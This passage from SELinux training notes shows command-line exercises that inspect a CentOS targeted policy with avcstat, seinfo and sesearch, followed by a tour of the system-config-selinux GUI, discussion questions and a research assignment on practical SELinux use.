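            out.append((rec["serial"],) + hit)
    return out
```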

 

 





 


 

 

 


 

 

 

 

[Exercise] Miscellaneous

 

# avcstat

lookups hits misses allocs reclaims frees

9001600 8979425 22175 22243 15440 21738

 

# seinfo

Statistics for policy file: /etc/selinux/targeted/policy/policy.24

Policy Version & Type: v.24 (binary, mls)

 

Classes: 81 Permissions: 235

Sensitivities: 1 Categories: 1024

Types: 3637 Attributes: 280

Users: 9 Roles: 12

Booleans: 217 Cond. Expr.: 257

Allow: 291046 Neverallow: 0

Auditallow: 123 Dontaudit: 226655

Type_trans: 33142 Type_change: 38

Type_member: 48 Role allow: 19

Role_trans: 308 Range_trans: 4521

Constraints: 90 Validatetrans: 0

Initial SIDs: 27 Fs_use: 23

Genfscon: 83 Portcon: 446

Netifcon: 0 Nodecon: 0

Permissives: 75 Polcap: 2

 

# seinfo -adomain -x

domain

sosreport_t

git_session_t

cfengine_execd_t

bootloader_t

netutils_t

qmail_tcp_env_t

devicekit_power_t

..... (omitted) .....

piranha_web_t

user_screen_t

condor_master_t

greylist_milter_t

calamaris_t

staff_openoffice_t

mailman_queue_t

 

# seinfo -adomain -x | wc -l

670

 

# seinfo --permissive -x

Permissive Types: 75

nova_api_t

sblim_reposd_t

nova_compute_t

nova_console_t

openvswitch_t

nova_network_t

..... (omitted) .....

vdagent_t

zarafa_ical_t

namespace_init_t

httpd_mediawiki_script_t

condor_schedd_t

condor_startd_t

condor_master_t

 

# seinfo --permissive -x | wc -l

77

# sesearch --role_allow -t httpd_sys_content_ /etc/selinux/targeted/policy/policy.24

Found 19 role allow rules:

allow system_r sysadm_r;

allow sysadm_r system_r;

allow sysadm_r staff_r;

allow sysadm_r user_r;

allow system_r guest_r;

allow logadm_r system_r;

allow system_r logadm_r;

allow system_r nx_server_r;

allow system_r staff_r;

allow staff_r logadm_r;

allow staff_r sysadm_r;

allow staff_r unconfined_r;

allow staff_r webadm_r;

allow unconfined_r system_r;

allow system_r unconfined_r;

allow system_r user_r;

allow webadm_r system_r;

allow system_r webadm_r;

allow system_r xguest_r;

 

# sesearch --allow | wc -l

291048

 

# sesearch --dontaudit | wc -l

226657

 

 

 

 

[Exercise] (GUI) Using the system-config-selinux tool

system-config-selinux menu

Status

Boolean

File Labeling

User Mapping

SELinux User

Network Port

Policy Module

Process Domain

 

# system-config-selinux &

(Screenshots of each tab, omitted here: Status, Boolean, File Labeling, User Mapping, SELinux User, Network Port, Policy Module, Process Domain)

Is SELinux really necessary?

 

() Mobile phones

() IoT devices and their control/monitoring systems

() Security appliances (e.g. Firewall, IPS/IDS, WAF)

() Core equipment in an IDC (data center)

() Home routers

 

How should SELinux be configured? (e.g. on a mobile phone)

Box technique

 

-------------------

BOX(Software) <-- SELINUX

-------------------

OS(System Software) <-- SELINUX

-------------------

 

 

 

4. Reference URLs

 

SELinux on CentOS-6.4 - part 1/2

http://www.youtube.com/watch?v=5XzHQvtGfI4

 

SELinux on CentOS 6.4 - part 2/2

http://www.youtube.com/watch?v=BRXDotR0Mio

 

SELinux?

http://www.ylabs.co.kr/index.php?document_srl=4030&mid=board_centos

 

 

[Exercise] Research how SELinux is used in practice (time limit: 30 min + 30 min for writing up)

Research SELinux and present the findings.
- Search internet resources
- Search newspaper articles
- Search academic papers
- Other

The presentation should focus mainly on how SELinux is used in practice.
() Where can SELinux be applied?

SELinux관련보고서_윤진식.hwp

